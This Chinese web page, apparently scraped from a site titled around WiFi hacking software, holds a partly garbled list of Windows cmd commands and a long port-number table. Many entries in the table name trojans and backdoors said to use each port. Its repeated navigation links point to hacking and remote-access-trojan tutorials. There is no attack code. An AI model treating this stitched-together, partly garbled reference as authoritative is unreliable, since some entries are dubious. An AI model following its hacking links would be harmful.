arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的存档，只读，系统，隐藏属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符设置环境变量

set 显示当前所有的环境变量

set p(或其它字?/ca

谁有计算机端口表啊我想设置下端口

常见端口

0|无效端口,通常用于分析操作系统

1|传输控制协议端口服务多路开关选择器

2|管理实用程序

3|压缩进程

5|远程作业登录

7|回显

9|丢弃

11|在线用户

13|时间

17|每日引用

18|消息发送协议

19|字符发生器

20|FTP文件传输协议(默认数据口)

21|FTP文件传输协议(控制)

22|SSH远程登录协议

23|telnet(终端仿真协议),木马Tiny Telnet Server开放此端口

24|预留给个人用邮件系统

25|SMTP服务器所开放的端口，用于发送邮件

27|NSW 用户系统 FE

29|MSG ICP

31|MSG验证,木马Master Paradise、HackersParadise开放此端口

33|显示支持协议

35|预留给个人打印机服务

37|时间

38|路由访问协议

39|资源定位协议

41|图形

42|主机名服务

43|who is服务

44|MPM(消息处理模块)标志协议

45|消息处理模块

46|消息处理模块(默认发送口)

47|NI FTP

48|数码音频后台服务

49|TACACS登录主机协议

50|远程邮件检查协议

51|IMP(接口信息处理机)逻辑地址维护

52|施乐网络服务系统时间协议

53|dns域名服务器

54|施乐网络服务系统票据交换

55|ISI图形语言

56|施乐网络服务系统验证

57|预留个人用终端访问

58|施乐网络服务系统邮件

59|预留个人文件服务

60|未定义

61|NI邮件

62|异步通讯适配器服务

63|whois++

64|通讯接口

65|TACACS数据库服务

66|Oracle SQL*NET

67|引导程序协议服务端

68|引导程序协议客户端

69|小型文件传输协议

70|信息检索协议

71|远程作业服务

72|远程作业服务

73|远程作业服务

74|远程作业服务

75|预留给个人拨出服务

76|分布式外部对象存储

77|预留给个人远程作业输入服务

78|修正TCP

79|查询远程主机在线用户等信息

80|http,用于网页浏览,木马Executor开放此端口

81|HOST2名称服务

82|传输实用程序

83|模块化智能终端ML设备

84|公用追踪设备

85|模块化智能终端ML设备

86|Micro Focus Cobol编程语言

87|预留给个人终端连接

88|Kerberros安全认证系统

89|SU/MIT telnet(终端仿真网关)

90|DNSIX 安全属性标记图

91|MIT Dover假脱机

92|网络打印协议

93|设备控制协议

94|Tivoli对象调度

96|DIXIE协议规范

97|快速远程虚拟文件协议

98|TAC新闻协议

99|后门程序ncx99开放此端口

100|未知用途

101|NIC 主机名称服务

102|消息传输代理

103|Genesis 点对点传输网络

105|信箱名称服务

106|3COM-TSMUX开放端口

107|远程Telnet服务

108|SNA 网关访问服务

109|POP2服务器开放此端口,用于接收邮件

110|POP3服务器开放此端口,用于接收邮件

111|SUN公司的RPC服务所有端口

112|McIDAS 数据传输协议

113|认证服务，用于鉴别TCP连接的用户

114|音频新闻多点服务

115|简单文件传输服务

116|ANSA REX 通知

117|UUCP 路径服务

118|SQL 服务

119|NEWS新闻组传输协议，承载USENET通信

121|木马BO jammerkillahV开放端口

122|SMAKY网络

123|网络时间协议，蠕虫病毒会利用，一般关闭

128|GSS X许可认证

129|密码生成器协议

130|Cisco软件开放端口

131|Cisco软件开放端口

132|Cisco软件开放端口

133|统计服务

134|INGRES-网络服务

135|DCOM服务，冲击波病毒利用，不能关闭

136|命名系统

137|NETBIOS协议应用，为共享开放

138|NETBIOS协议应用，为共享开放

139|NETBIOS协议应用，为共享开放

140|EMFIS数据服务

141|EMFIS控制服务

143|Interim邮件访问协议

144|UMA软件开放端口

145|UAAC协议

149|AED 512仿真服务

150|SQL(结构化查询语言)-网络

152|后台文件传输协议

156|SQL(结构化查询语言)服务

158|PC邮件服务器

159|NSS-路由

160|SGMP-陷阱

161|简单网络管理协议

162|SNMP陷阱

163|CMIP/TCP 管理

164|CMIP/TCP 代理

166|Sirius系统

169|发送

170|网络附言

177|x显示管理控制协议，入侵者通过它访问X-windows操作台

178|NextStep Window 服务

179|边界网关协议

180|图表

181|统一

184|OC服务器

185|远程-KIS

186|KIS 协议

187|应用通信接口

189|队列文件传输

190|网关进入控制协议

191|Prospero 目录服务

192|OSU 网络监视系统

193|Spider 远程控制协议

194|多线交谈协议

197|目录地址服务

198|目录地址服务监视器

200|IBM系统资源控制器

201|AppleTalk(Mac机所用的网络协议)路由保证

202|AppleTalk(Mac机所用的网络协议)Name Binding

203|AppleTalk(Mac机所用的网络协议)未用端口

204|AppleTalk(Mac机所用的网络协议)回显

205|AppleTalk(Mac机所用的网络协议)未用端口

206|AppleTalk(Mac机所用的网络协议)区信息

207|AppleTalk(Mac机所用的网络协议)未用端口

208|AppleTalk(Mac机所用的网络协议)未用端口

209|快速邮件传输协议

210|ANSI(美国国家标准协会)Z39.50

211|Texas Instruments 914C/G终端

213|IPX(以太网所用的协议)

218|Netix消息记录协议

219|Unisys ARPs

220|交互邮件访问协议 v3

223|证书分发中心

224|masq拨号器

241|预留端口 (224-241)

245|链接

246|显示系统协议

257|安全电子交易系统

258|Yak Winsock 个人聊天

259|有效短程遥控

260|开放端口

261|IIOP 基于TLS/SSL的命名服务

266|SCSI(小型计算机系统接口)on ST

267|Tobit David服务层

268|Tobit David复制

281|个人连结

282|Cable端口A/X

286|FXP通信

308|Novastor备份

313|Magenta逻辑

318|PKIX时间标记

333|Texar安全端口

344|Prospero数据存取协议

345|Perf分析工作台

346|Zebra服务器

347|Fatmen服务器

348|Cabletron管理协议

358|Shrink可上网家电协议

359|网络安全风险管理协议

362|SRS发送

363|RSVP隧道

372|列表处理

373|Legend公司

374|Legend公司

376|AmigaEnvoy网络查询协议

377|NEC公司

378|NEC公司

379|TIA/EIA/IS-99调制解调器客户端

380|TIA/EIA/IS-99调制解调器服务器

381|hp(惠普)性能数据收集器

382|hp(惠普)性能数据控制节点

383|hp(惠普)性能数据警报管理

384|远程网络服务器系统

385|IBM应用程序

386|ASA信息路由器定义文件.

387|Appletalk更新路由.

389|轻型目录访问协议

395|网络监视控制协议

396|Novell(美国Novell公司)Netware(Novell公司出的网络操作系统)over IP

400|工作站解决方案

401|持续电源

402|Genie协议

406|交互式邮件支持协议

408|Prospero资源管理程序

409|Prospero资源节点管理.

410|DEC(数据设备公司)远程调试协议

411|远程MT协议

412|陷阱协定端口

413|存储管理服务协议

414|信息查询

415|B网络

423|IBM操作计划和控制开端

424|IBM操作计划和控制追踪

425|智能计算机辅助设计

427|服务起位置

434|移动ip代理

435|移动ip管理

443|基于TLS/SSL的网页浏览端口，能提供加密和通过安全端口传输的另一种HTTP

444|简单网络内存分页协议

445|Microsoft-DS，为共享开放，震荡波病毒利用，一般应关闭

446|DDM-远程关系数据库访问

447|DDM-分布式文件管理

448|DDM-使用安全访问远程数据库

456|木马HACKERS PARADISE开放此端口

458|apple quick time软件开放端口

459|ampr-rcmd命令

464|k密码服务

469|广播控制协议

470|scx-代理

472|ljk-登陆

481|Ph服务

487|简单异步文件传输

489|nest-协议

491|go-登陆

499|ISO ILL协议

500|Internet密钥交换，Lsass开放端口，不能关闭

509|陷阱

510|FirstClass协议

512|远程进程执行

513|远程登陆

514|cmd命令

515|spooler

516|可视化数据

518|交谈

519|unix时间

520|扩展文件名称服务器

525|时间服务

526|新日期

529|在线聊天系统服务

530|远程过程调用

531|聊天

532|读新闻

533|紧急广播端口

534|MegaMedia管理端

537|网络流媒体协议

542|商业

543|Kerberos(软件)v4/v5

544|krcmd命令

546|DHCPv6 客户端

547|DHCPv6 服务器

552|设备共享

554|Real Time Stream控制协议

555|木马PhAse1.0、Stealth Spy、IniKiller开放此端口

556|远距离文件服务器

563|基于TLS/SSL的网络新闻传输协议

564|plan 9文件服务

565|whoami查询

566|streettalk

567|banyan-rpc(远程过程调用)

568|DPA成员资格

569|MSN成员资格

570|demon(调试监督程序)

571|udemon(调试监督程序)

572|声纳

573|banyan-贵宾

574|FTP软件代理系统

581|Bundle Discovery 协议

582|SCC安全

583|Philips视频会议

584|密钥服务器

585|IMAP4+SSL (Use 993 instead)

586|密码更改

587|申请

589|Eye连结

595|CAB协议

597|PTC名称服务

598|SCO网络服务器管理3

599|Aeolon Core协议

600|Sun IPC(进程间通讯)服务器

601|可靠系统登陆服务

604|通道

606|Cray统一资源管理

608|发送人-传递/提供文件传输器

609|npmp-陷阱

610|npmp-本地

611|npmp-gui( 图形用户界面)

612|HMMP指引

613|HMMP操作

614|SSL(加密套接字协议层)shell(壳)

615|Internet配置管理

616|SCO(Unix系统)系统管理服务器

617|SCO桌面管理服务器

619|Compaq(康柏公司)EVM

620|SCO服务器管理

623|ASF远程管理控制协议

624|Crypto管理

631|IPP (Internet打印协议)

633|服务更新(Sterling软件)

637|局域网服务器

641|repcmd命令

647|DHCP(动态主机配置协议)Failover

648|注册登记协议(RRP)

649|Cadview-3d软件协议

666|木马Attack FTP、Satanz Backdoor开放此端口

808|ccproxy http/gopher/ftp (over http)协议

1001|木马Silencer，WebEx开放端口

1011|木马Doly开放端口

1024|动态端口的开始,木马yai开放端口

1025|inetinfo.exe(互联网信息服务)木马netspy开放端口

1026|inetinfo.exe(互联网信息服务)

1027|应用层网关服务

1030|应用层网关服务

1031|BBN IAD

1033|本地网络信息端口

1034|同步通知

1036|安全部分传输协议

1070|木马Psyber Stream，Streaming Audio开放端口

1071|网络服务开放端口

1074|网络服务开放端口

1080|Socks这一协议以通道方式穿过防火墙，允许防火墙后面的人通过一个IP地址访问INTERNET

1110|卡巴斯基反病毒软件开放此端口

1125|卡巴斯基反病毒软件开放此端口

1203|许可证生效端口

1204|登陆请求监听端口

1206|Anthony数据端口

1222|SNI RD网络端口

1233|普遍的附录服务器端口

1234|木马SubSeven2.0、Ultors Trojan开放此端口

1243|木马SubSeven1.0/1.9开放此端口

1245|木马Vodoo，GabanBus，NetBus，Vodoo开放此端口

1273|EMC-网关端口

1289|JWalk服务器端口

1290|WinJa服务器端口

1333|密码策略(网络服务)(svchost.exe)

1334|网络服务(svchost.exe)

1335|数字公正协议

1336|即时聊天协议(svchost.exe)

1349|注册网络协议端口

1350|注册网络协议端口

1371|富士通配置协议端口

1372|富士通配置协议端口

1374|EPI软件系统端口

1376|IBM个人-个人软件端口

1377|Cichlid许可证管理端口

1378|Elan许可证管理端口

1380|Telesis网络许可证管理端口

1381|苹果网络许可证管理端口

1386|CheckSum 许可证管理端口

1387|系统开放端口(rundll32.exe)

1388|数据库高速缓存端口

1389|文档管理端口

1390|存储控制器端口

1391|存储器存取服务器端口

1392|打印管理端口

1393|网络登陆服务器端口

1394|网络登陆客户端端口

1395|PC工作站管理软件端口

1396|DVL活跃邮件端口

1397|音频活跃邮件端口

1398|视频活跃邮件端口

1399|Cadkey许可证管理端口

1433|Microsoft的SQL服务开放端口

1434|Microsoft的SQL服务监视端口

1492|木马FTP99CMP开放此端口

1509|木马Psyber Streaming Server开放此端口

1512|Microsoft Windows网络名称服务

1524|许多攻击脚本安装一个后门SHELL于这个端口

1600|木马Shivka-Burka开放此端口

1645|远程认证拨号用户服务

1701|第2层隧道协议

1731|NetMeeting音频调用控制

1801|Microsoft消息队列服务器

1807|木马SpySender开放此端口

1900|可被利用ddos攻击，一般关闭

1912|金山词霸开放此端口

1981|木马ShockRave开放此端口

1999|木马BackDoor,yai开放此端口

2000|木马GirlFriend 1.3、Millenium 1.0开放此端口

2001|木马Millenium 1.0、Trojan Cow,黑洞2001开放此端口

2003|GNU 查询

2023|木马Pass Ripper开放此端口

2049|NFS程序常运行于此端口

2115|木马Bugs开放此端口

2140|木马Deep Throat 1.0/3.0，The Invasor开放此端口

2500|应用固定端口会话复制的RPC客户

2504|网络平衡负荷

2565|木马Striker开放此端口

2583|木马Wincrash 2.0开放此端口

2801|木马Phineas Phucker开放此端口

2847|诺顿反病毒服务开放此端口

3024|木马WinCrash开放此端口

3128|squid http代理服务器开放此端口

3129|木马Master Paradise开放此端口

3150|木马The Invasor,deep throat开放此端口

3210|木马SchoolBus开放此端口

3306|MySQL开放此端口

3333|木马Prosiak开放此端口

3389|WINDOWS 2000终端开放此端口

3456|inetinfo.exe(互联网信息服务)开放端口，VAT默认数据

3457|VAT默认控制

3527|Microsoft消息队列服务器

3700|木马Portal of Doom开放此端口

3996|木马RemoteAnything开放此端口

4000|腾讯QQ客户端开放此端口

4060|木马RemoteAnything开放此端口

4092|木马WinCrash开放此端口

4133|NUTS Bootp服务器

4134|NIFTY-Serve HMI协议

4141|Workflow服务器

4142|文档服务器

4143|文档复制

4145|VVR控制

4321|远程Who Is查询

4333|微型sql服务器

4349|文件系统端口记录

4350|网络设备

4351|PLCY网络服务

4453|NSS警报管理

4454|NSS代理管理

4455|PR聊天用户

4456|PR聊天服务器

4457|PR注册

4480|Proxy+ HTTP代理端口

4500|Lsass开放端口，不能关闭

4547|Lanner许可管理

4555|RSIP端口

4590|木马ICQTrojan开放此端口

4672|远程文件访问服务器

4752|简单网络音频服务器

4800|Icona快速消息系统

4801|Icona网络聊天

4802|Icona许可系统服务器

4848|App服务器-Admin HTTP

4849|App服务器-Admin HTTPS

4950|木马IcqTrojan开放5000端口

5000|木马blazer5，Sockets de Troie开放5000端口，一般应关闭

5001|木马Sockets de Troie开放5001端口

5006|wsm服务器

5007|wsm服务器ssl

5022|mice服务器

5050|多媒体会议控制协议

5051|ITA代理

5052|ITA管理

5137|MyCTS服务器端口

5150|Ascend通道管理协议

5154|BZFlag游戏服务器

5190|America-Online(美国在线)

5191|AmericaOnline1(美国在线)

5192|AmericaOnline2(美国在线)

5193|AmericaOnline3(美国在线)

5222|Jabber客户端连接

5225|HP(惠普公司)服务器

5226|HP(惠普公司)

5232|SGI绘图软件端口

5250|i网关

5264|3Com网络端口1

5265|3Com网络端口2

5269|Jabber服务器连接

5306|Sun MC组

5321|木马Sockets de Troie开放5321端口

5400|木马Blade Runner开放此端口

5401|木马Blade Runner开放此端口

5402|木马Blade Runner开放此端口

5405|网络支持

5409|Salient数据服务器

5410|Salient用户管理

5415|NS服务器

5416|SNS网关

5417|SNS代理

5421|网络支持2

5423|虚拟用户

5427|SCO-PEER-TTA(Unix系统)

5432|PostgreSQL数据库

5550|木马xtcp开放此端口

5569|木马Robo-Hack开放此端口

5599|公司远程安全安装

5600|公司安全管理

5601|公司安全代理

5631|pcANYWHERE(软件)数据

5632|pcANYWHERE(软件)数据

5673|JACL消息服务器

5675|V5UA应用端口

5676|RA管理

5678|远程复制代理连接

5679|直接电缆连接

5720|MS-执照

5729|Openmail用户代理层

5730|Steltor's日历访问

5731|netscape(网景)suiteware

5732|netscape(网景)suiteware

5742|木马WinCrash1.03开放此端口

5745|fcopy-服务器

5746|fcopys-服务器

5755|OpenMail(邮件服务器)桌面网关服务器

5757|OpenMail(邮件服务器)X.500目录服务器

5766|OpenMail (邮件服务器)NewMail服务器

5767|OpenMail (邮件服务器)请求代理曾(安全)

5768|OpenMail(邮件服务器) CMTS服务器

5777|DALI端口

5800|虚拟网络计算

5801|虚拟网络计算

5802|虚拟网络计算HTTP访问, d

5803|虚拟网络计算HTTP访问, d

5900|虚拟网络计算机显示0

5901|虚拟网络计算机显示1

5902|虚拟网络计算机显示2

5903|虚拟网络计算机显示3

6000|X Window 系统

6001|X Window 服务器

6002|X Window 服务器

6003|X Window 服务器

6004|X Window 服务器

6005|X Window 服务器

6006|X Window 服务器

6007|X Window 服务器

6008|X Window 服务器

6009|X Window 服务器

6456|SKIP证书发送

6471|LVision许可管理器

6505|BoKS管理私人端口

6506|BoKS管理公共端口

6507|BoKS Dir服务器,私人端口

6508|BoKS Dir服务器,公共端口

6509|MGCS-MFP端口

6510|MCER端口

6566|SANE控制端口

6580|Parsec主服务器

6581|Parsec对等网络

6582|Parsec游戏服务器

6588|AnalogX HTTP代理端口

6631|Mitchell电信主机

6667|Internet多线交谈

6668|Internet多线交谈

6670|木马Deep Throat开放此端口

6671|木马Deep Throat 3.0开放此端口

6699|Napster文件(MP3)共享服务

6701|KTI/ICAD名称服务器

6788|SMC软件-HTTP

6789|SMC软件-HTTPS

6841|Netmo软件默认开放端口

6842|Netmo HTTP服务

6883|木马DeltaSource开放此端口

6939|木马Indoctrination开放此端口

6969|木马Gatecrasher、Priority开放此端口

6970|real音频开放此端口

7000|木马Remote Grab开放此端口

7002|使用者组数据库

7003|音量定位数据库

7004|AFS/Kerberos认证服务

7005|音量管理服务

7006|错误解释服务

7007|Basic监督进程

7008|服务器-服务器更新程序

7009|远程缓存管理服务

7011|Talon软件发现端口

7012|Talon软件引擎

7013|Microtalon发现

7014|Microtalon通信

7015|Talon网络服务器

7020|DP服务

7021|DP服务管理

7100|X字型服务

7121|虚拟原型许可证管理

7300|木马NetMonitor开放此端口

7301|木马NetMonitor开放此端口

7306|木马NetMonitor，NetSpy1.0开放此端口

7307|木马NetMonitor开放此端口

7308|木马NetMonitor开放此端口

7323|Sygate服务器端

7511|木马聪明基因开放此端口

7588|Sun许可证管理

7597|木马Quaz开放此端口

7626|木马冰河开放此端口

7633|PMDF管理

7674|iMQ SSL通道

7675|iMQ通道

7676|木马Giscier开放此端口

7720|Med图象入口

7743|Sakura脚本传递协议

7789|木马ICKiller开放此端口

7797|Propel连接器端口

7798|Propel编码器端口

8000|腾讯QQ服务器端开放此端口

8001|VCOM通道

8007|Apache(类似iis)jServ协议1.x

8008|HTTP Alternate

8009|Apache(类似iis)JServ协议1.3

8010|Wingate代理开放此端口

8011|木马way2.4开放此端口

8022|OA-系统

8080|WWW代理开放此端口

8081|ICECap控制台

8082|BlackIce(防止黑客软件)警报发送到此端口

8118|Privoxy HTTP代理

8121|Apollo数据端口

8122|Apollo软件管理端口

8181|Imail

8225|木马灰鸽子开放此端口

8311|木马初恋情人开放此端口

8351|服务器寻找

8416|eSpeech Session协议

8417|eSpeech RTP协议

8473|虚拟点对点

8668|网络地址转换

8786|Message客户端

8787|Message服务器

8954|Cumulus管理端口

9000|CS监听

9001|ETL服务管理

9002|动态id验证

9021|Pangolin验证

9022|PrivateArk远程代理

9023|安全网络登陆-1

9024|安全网络登陆-2

9025|安全网络登陆-3

9026|安全网络登陆-4

9101|Bacula控制器

9102|Bacula文件后台

9103|Bacula存储邮件后台

9111|DragonIDS控制台

9217|FSC通讯端口

9281|软件传送端口1

9282|软件传送端口2

9346|C技术监听

9400|木马Incommand 1.0开放此端口

9401|木马Incommand 1.0开放此端口

9402|木马Incommand 1.0开放此端口

9594|信息系统

9595|Ping Discovery服务

9800|WebDav源端口

9801|Sakura脚本转移协议-2

9802|WebDAV Source TLS/SSL

9872|木马Portal of Doom开放此端口

9873|木马Portal of Doom开放此端口

9874|木马Portal of Doom开放此端口

9875|木马Portal of Doom开放此端口

9899|木马InIkiller开放此端口

9909|域名时间

9911|SYPECom传送协议

9989|木马iNi-Killer开放此端口

9990|OSM Applet程序服务器

9991|OSM事件服务器

10000|网络数据管理协议

10001|SCP构造端口

10005|安全远程登陆

10008|Octopus多路器

10067|木马iNi-Killer开放此端口

10113|NetIQ端点

10115|NetIQ端点

10116|NetIQVoIP鉴定器

10167|木马iNi-Killer开放此端口

11000|木马SennaSpy开放此端口

11113|金山词霸开放此端口

11233|木马Progenic trojan开放此端口

12076|木马Telecommando开放此端口

12223|木马Hack'99 KeyLogger开放此端口

12345|木马NetBus1.60/1.70、GabanBus开放此端口

12346|木马NetBus1.60/1.70、GabanBus开放此端口

12361|木马Whack-a-mole开放此端口

13223|PowWow 客户端，是Tribal Voice的聊天程序

13224|PowWow 服务器，是Tribal Voice的聊天程序

16959|木马Subseven开放此端口

16969|木马Priority开放此端口

17027|外向连接

19191|木马蓝色火焰开放此端口

20000|木马Millennium开放此端口

20001|木马Millennium开放此端口

20034|木马NetBus Pro开放此端口

21554|木马GirlFriend开放此端口

22222|木马Prosiak开放此端口

23444|木马网络公牛开放此端口

23456|木马Evil FTP、Ugly FTP开放此端口

25793|Vocaltec地址服务器

26262|K3软件-服务器

26263|K3软件客户端

26274|木马Delta开放此端口

27374|木马Subseven 2.1开放此端口

30100|木马NetSphere开放此端口

30129|木马Masters Paradise开放此端口

30303|木马Socket23开放此端口

30999|木马Kuang开放此端口

31337|木马BO(Back Orifice)开放此端口

31338|木马BO(Back Orifice)，DeepBO开放此端口

31339|木马NetSpy DK开放此端口

31666|木马BOWhack开放此端口

31789|Hack-a-tack

32770|sun solaris RPC服务开放此端口

33333|木马Prosiak开放此端口

33434|路由跟踪

34324|木马Tiny Telnet Server、BigGluck、TN开放此端口

36865|KastenX软件端口

38201|Galaxy7软件数据通道

39681|TurboNote默认端口

40412|木马The Spy开放此端口

40421|木马Masters Paradise开放此端口

40422|木马Masters Paradise开放此端口

40423|木马Masters Paradise开放此端口

40426|木马Masters Paradise开放此端口

40843|CSCC 防火墙

43210|木马SchoolBus 1.0/2.0开放此端口

43190|IP-PROVISION

44321|PCP服务器(pmcd)

44322|PCP服务器(pmcd)代理

44334|微型个人防火墙端口

44442|ColdFusion软件端口

44443|ColdFusion软件端口

44445|木马Happypig开放此端口

45576|E代时光专业代理开放此端口

47262|木马Delta开放此端口

47624|Direct Play服务器

47806|ALC协议

48003|Nimbus网关

50505|木马Sockets de Troie开放此端口

50766|木马Fore开放此端口

53001|木马Remote Windows Shutdown开放此端口

54320|木马bo2000开放此端口

54321|木马SchoolBus 1.0/2.0开放此端口

61466|木马Telecommando开放此端口

65000|木马Devil 1.03开放此端口

65301|PC Anywhere软件开放端口

=================================================

仅供参考！

wifiillk黑客软件_wifi黑客教程

标签：wifiillk黑客软件

上一篇：黑客用的什么手机软件下载_手机上有哪些黑客软件
下一篇：和男朋友除了开房_和男朋友开两间房好吗

wifiillk黑客软件_wifi黑客教程

导航：

计算机命令

有木有黑客视频教程-魔镜传说远控木马使用教程mjcs.wmv种子下载，谢恩公！

关于DOS命令?

cmd中全部命令`````

谁有计算机端口表啊我想设置下端口

相关推荐

已有2位网友发表了看法：

取消回复欢迎你发表评论:

wifiillk黑客软件_wifi黑客教程

导航：

计算机命令

有木有黑客视频教程-魔镜传说远控木马使用教程mjcs.wmv种子下载，谢恩公！

关于DOS命令?

cmd中全部命令`````

谁有计算机 端口表 啊 我想设置下端口

相关推荐

已有2位网友发表了看法：

取消回复欢迎 你 发表评论:

谁有计算机端口表啊我想设置下端口

取消回复欢迎你发表评论: